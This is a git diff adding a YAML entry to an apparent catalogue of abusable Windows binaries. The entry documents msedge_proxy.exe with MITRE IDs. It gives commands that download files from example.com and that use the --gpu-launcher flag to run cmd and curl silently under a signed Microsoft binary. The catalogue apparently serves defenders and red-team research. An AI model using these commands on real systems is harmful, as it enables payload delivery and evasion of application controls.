diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml new file mode 100644 index 0000000..dfe5567 --- /dev/null +++ b/yml/OSBinaries/msedge_proxy.yml @@ -0,0 +1,29 @@ +Name: msedge_proxy.exe +Description: Microsoft Edge Browser +Author: Mert Daş +Created: 2023-08-18 +Commands: + - Command: msedge_proxy.exe http://example.com/test.zip + Description: msedge_proxy will download malicious file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + Description: Edge will silently download the file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + Description: msedge_proxy.exe will execute file in the background + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 +Acknowledgement: + - Person: Mert Daş + Handle: '@merterpreter'